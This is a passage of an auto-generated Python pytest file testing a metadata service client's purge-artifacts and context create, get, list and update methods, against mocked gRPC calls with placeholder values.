# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/spam")
)
response = await client.purge_artifacts(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.PurgeArtifactsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
@pytest.mark.asyncio
async def test_purge_artifacts_async_from_dict():
await test_purge_artifacts_async(request_type=dict)
def test_purge_artifacts_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.PurgeArtifactsRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_artifacts), "__call__") as call:
call.return_value = operations_pb2.Operation(name="operations/op")
client.purge_artifacts(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_purge_artifacts_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.PurgeArtifactsRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_artifacts), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/op")
)
await client.purge_artifacts(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
def test_purge_artifacts_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_artifacts), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/op")
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.purge_artifacts(
parent="parent_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
def test_purge_artifacts_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.purge_artifacts(
metadata_service.PurgeArtifactsRequest(),
parent="parent_value",
)
@pytest.mark.asyncio
async def test_purge_artifacts_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_artifacts), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/op")
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/spam")
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.purge_artifacts(
parent="parent_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_purge_artifacts_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.purge_artifacts(
metadata_service.PurgeArtifactsRequest(),
parent="parent_value",
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.CreateContextRequest,
dict,
],
)
def test_create_context(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_context), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gca_context.Context(
name="name_value",
display_name="display_name_value",
etag="etag_value",
parent_contexts=["parent_contexts_value"],
schema_title="schema_title_value",
schema_version="schema_version_value",
description="description_value",
)
response = client.create_context(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.CreateContextRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gca_context.Context)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.etag == "etag_value"
assert response.parent_contexts == ["parent_contexts_value"]
assert response.schema_title == "schema_title_value"
assert response.schema_version == "schema_version_value"
assert response.description == "description_value"
def test_create_context_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_context), "__call__") as call:
client.create_context()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.CreateContextRequest()
@pytest.mark.asyncio
async def test_create_context_async(
transport: str = "grpc_asyncio", request_type=metadata_service.CreateContextRequest
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_context), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gca_context.Context(
name="name_value",
display_name="display_name_value",
etag="etag_value",
parent_contexts=["parent_contexts_value"],
schema_title="schema_title_value",
schema_version="schema_version_value",
description="description_value",
)
)
response = await client.create_context(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.CreateContextRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gca_context.Context)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.etag == "etag_value"
assert response.parent_contexts == ["parent_contexts_value"]
assert response.schema_title == "schema_title_value"
assert response.schema_version == "schema_version_value"
assert response.description == "description_value"
@pytest.mark.asyncio
async def test_create_context_async_from_dict():
await test_create_context_async(request_type=dict)
def test_create_context_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.CreateContextRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_context), "__call__") as call:
call.return_value = gca_context.Context()
client.create_context(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_create_context_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.CreateContextRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_context), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gca_context.Context())
await client.create_context(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
def test_create_context_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_context), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gca_context.Context()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.create_context(
parent="parent_value",
context=gca_context.Context(name="name_value"),
context_id="context_id_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
arg = args[0].context
mock_val = gca_context.Context(name="name_value")
assert arg == mock_val
arg = args[0].context_id
mock_val = "context_id_value"
assert arg == mock_val
def test_create_context_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.create_context(
metadata_service.CreateContextRequest(),
parent="parent_value",
context=gca_context.Context(name="name_value"),
context_id="context_id_value",
)
@pytest.mark.asyncio
async def test_create_context_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_context), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gca_context.Context()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gca_context.Context())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.create_context(
parent="parent_value",
context=gca_context.Context(name="name_value"),
context_id="context_id_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
arg = args[0].context
mock_val = gca_context.Context(name="name_value")
assert arg == mock_val
arg = args[0].context_id
mock_val = "context_id_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_create_context_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.create_context(
metadata_service.CreateContextRequest(),
parent="parent_value",
context=gca_context.Context(name="name_value"),
context_id="context_id_value",
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.GetContextRequest,
dict,
],
)
def test_get_context(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_context), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = context.Context(
name="name_value",
display_name="display_name_value",
etag="etag_value",
parent_contexts=["parent_contexts_value"],
schema_title="schema_title_value",
schema_version="schema_version_value",
description="description_value",
)
response = client.get_context(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.GetContextRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, context.Context)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.etag == "etag_value"
assert response.parent_contexts == ["parent_contexts_value"]
assert response.schema_title == "schema_title_value"
assert response.schema_version == "schema_version_value"
assert response.description == "description_value"
def test_get_context_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_context), "__call__") as call:
client.get_context()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.GetContextRequest()
@pytest.mark.asyncio
async def test_get_context_async(
transport: str = "grpc_asyncio", request_type=metadata_service.GetContextRequest
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_context), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
context.Context(
name="name_value",
display_name="display_name_value",
etag="etag_value",
parent_contexts=["parent_contexts_value"],
schema_title="schema_title_value",
schema_version="schema_version_value",
description="description_value",
)
)
response = await client.get_context(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.GetContextRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, context.Context)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.etag == "etag_value"
assert response.parent_contexts == ["parent_contexts_value"]
assert response.schema_title == "schema_title_value"
assert response.schema_version == "schema_version_value"
assert response.description == "description_value"
@pytest.mark.asyncio
async def test_get_context_async_from_dict():
await test_get_context_async(request_type=dict)
def test_get_context_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.GetContextRequest()
request.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_context), "__call__") as call:
call.return_value = context.Context()
client.get_context(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=name_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_get_context_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.GetContextRequest()
request.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_context), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(context.Context())
await client.get_context(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=name_value",
) in kw["metadata"]
def test_get_context_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_context), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = context.Context()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.get_context(
name="name_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
def test_get_context_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get_context(
metadata_service.GetContextRequest(),
name="name_value",
)
@pytest.mark.asyncio
async def test_get_context_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_context), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = context.Context()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(context.Context())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.get_context(
name="name_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_get_context_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.get_context(
metadata_service.GetContextRequest(),
name="name_value",
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.ListContextsRequest,
dict,
],
)
def test_list_contexts(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_contexts), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_service.ListContextsResponse(
next_page_token="next_page_token_value",
)
response = client.list_contexts(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.ListContextsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListContextsPager)
assert response.next_page_token == "next_page_token_value"
def test_list_contexts_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_contexts), "__call__") as call:
client.list_contexts()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.ListContextsRequest()
@pytest.mark.asyncio
async def test_list_contexts_async(
transport: str = "grpc_asyncio", request_type=metadata_service.ListContextsRequest
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_contexts), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_service.ListContextsResponse(
next_page_token="next_page_token_value",
)
)
response = await client.list_contexts(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.ListContextsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListContextsAsyncPager)
assert response.next_page_token == "next_page_token_value"
@pytest.mark.asyncio
async def test_list_contexts_async_from_dict():
await test_list_contexts_async(request_type=dict)
def test_list_contexts_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.ListContextsRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_contexts), "__call__") as call:
call.return_value = metadata_service.ListContextsResponse()
client.list_contexts(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_list_contexts_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.ListContextsRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_contexts), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_service.ListContextsResponse()
)
await client.list_contexts(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
def test_list_contexts_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_contexts), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_service.ListContextsResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.list_contexts(
parent="parent_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
def test_list_contexts_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.list_contexts(
metadata_service.ListContextsRequest(),
parent="parent_value",
)
@pytest.mark.asyncio
async def test_list_contexts_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_contexts), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_service.ListContextsResponse()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_service.ListContextsResponse()
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.list_contexts(
parent="parent_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_list_contexts_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.list_contexts(
metadata_service.ListContextsRequest(),
parent="parent_value",
)
def test_list_contexts_pager(transport_name: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials,
transport=transport_name,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_contexts), "__call__") as call:
# Set the response to a series of pages.
call.side_effect = (
metadata_service.ListContextsResponse(
contexts=[
context.Context(),
context.Context(),
context.Context(),
],
next_page_token="abc",
),
metadata_service.ListContextsResponse(
contexts=[],
next_page_token="def",
),
metadata_service.ListContextsResponse(
contexts=[
context.Context(),
],
next_page_token="ghi",
),
metadata_service.ListContextsResponse(
contexts=[
context.Context(),
context.Context(),
],
),
RuntimeError,
)
metadata = ()
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)),
)
pager = client.list_contexts(request={})
assert pager._metadata == metadata
results = list(pager)
assert len(results) == 6
assert all(isinstance(i, context.Context) for i in results)
def test_list_contexts_pages(transport_name: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials,
transport=transport_name,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_contexts), "__call__") as call:
# Set the response to a series of pages.
call.side_effect = (
metadata_service.ListContextsResponse(
contexts=[
context.Context(),
context.Context(),
context.Context(),
],
next_page_token="abc",
),
metadata_service.ListContextsResponse(
contexts=[],
next_page_token="def",
),
metadata_service.ListContextsResponse(
contexts=[
context.Context(),
],
next_page_token="ghi",
),
metadata_service.ListContextsResponse(
contexts=[
context.Context(),
context.Context(),
],
),
RuntimeError,
)
pages = list(client.list_contexts(request={}).pages)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
@pytest.mark.asyncio
async def test_list_contexts_async_pager():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_contexts), "__call__", new_callable=mock.AsyncMock
) as call:
# Set the response to a series of pages.
call.side_effect = (
metadata_service.ListContextsResponse(
contexts=[
context.Context(),
context.Context(),
context.Context(),
],
next_page_token="abc",
),
metadata_service.ListContextsResponse(
contexts=[],
next_page_token="def",
),
metadata_service.ListContextsResponse(
contexts=[
context.Context(),
],
next_page_token="ghi",
),
metadata_service.ListContextsResponse(
contexts=[
context.Context(),
context.Context(),
],
),
RuntimeError,
)
async_pager = await client.list_contexts(
request={},
)
assert async_pager.next_page_token == "abc"
responses = []
async for response in async_pager: # pragma: no branch
responses.append(response)
assert len(responses) == 6
assert all(isinstance(i, context.Context) for i in responses)
@pytest.mark.asyncio
async def test_list_contexts_async_pages():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_contexts), "__call__", new_callable=mock.AsyncMock
) as call:
# Set the response to a series of pages.
call.side_effect = (
metadata_service.ListContextsResponse(
contexts=[
context.Context(),
context.Context(),
context.Context(),
],
next_page_token="abc",
),
metadata_service.ListContextsResponse(
contexts=[],
next_page_token="def",
),
metadata_service.ListContextsResponse(
contexts=[
context.Context(),
],
next_page_token="ghi",
),
metadata_service.ListContextsResponse(
contexts=[
context.Context(),
context.Context(),
],
),
RuntimeError,
)
pages = []
async for page_ in (
await client.list_contexts(request={})
).pages: # pragma: no branch
pages.append(page_)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
@pytest.mark.parametrize(
"request_type",
[
metadata_service.UpdateContextRequest,
dict,
],
)
def test_update_context(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_context), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gca_context.Context(
name="name_value",
display_name="display_name_value",
etag="etag_value",
parent_contexts=["parent_contexts_value"],
schema_title="schema_title_value",
schema_version="schema_version_value",
description="description_value",
)
response = client.update_context(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.UpdateContextRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gca_context.Context)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.etag == "etag_value"
assert response.parent_contexts == ["parent_contexts_value"]
assert response.schema_title == "schema_title_value"
assert response.schema_version == "schema_version_value"
assert response.description == "description_value"
def test_update_context_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_context), "__call__") as call:
client.update_context()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.UpdateContextRequest()
@pytest.mark.asyncio
async def test_update_context_async(
transport: str = "grpc_asyncio", request_type=metadata_service.UpdateContextRequest
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_context), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gca_context.Context(
name="name_value",
display_name="display_name_value",
etag="etag_value",
parent_contexts=["parent_contexts_value"],
schema_title="schema_title_value",
schema_version="schema_version_value",
description="description_value",
)
)
response = await client.update_context(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.UpdateContextRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gca_context.Context)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.etag == "etag_value"
assert response.parent_contexts == ["parent_contexts_value"]
assert response.schema_title == "schema_title_value"
assert response.schema_version == "schema_version_value"
assert response.description == "description_value"
@pytest.mark.asyncio
async def test_update_context_async_from_dict():
await test_update_context_async(request_type=dict)
def test_update_context_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.UpdateContextRequest()
request.context.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_context), "__call__") as call:
call.return_value = gca_context.Context()
client.update_context(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"context.name=name_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_update_context_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.UpdateContextRequest()
request.context.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_context), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gca_context.Context())
await client.update_context(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"context.name=name_value",
) in kw["metadata"]
def test_update_context_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_context), "__call__") as call:
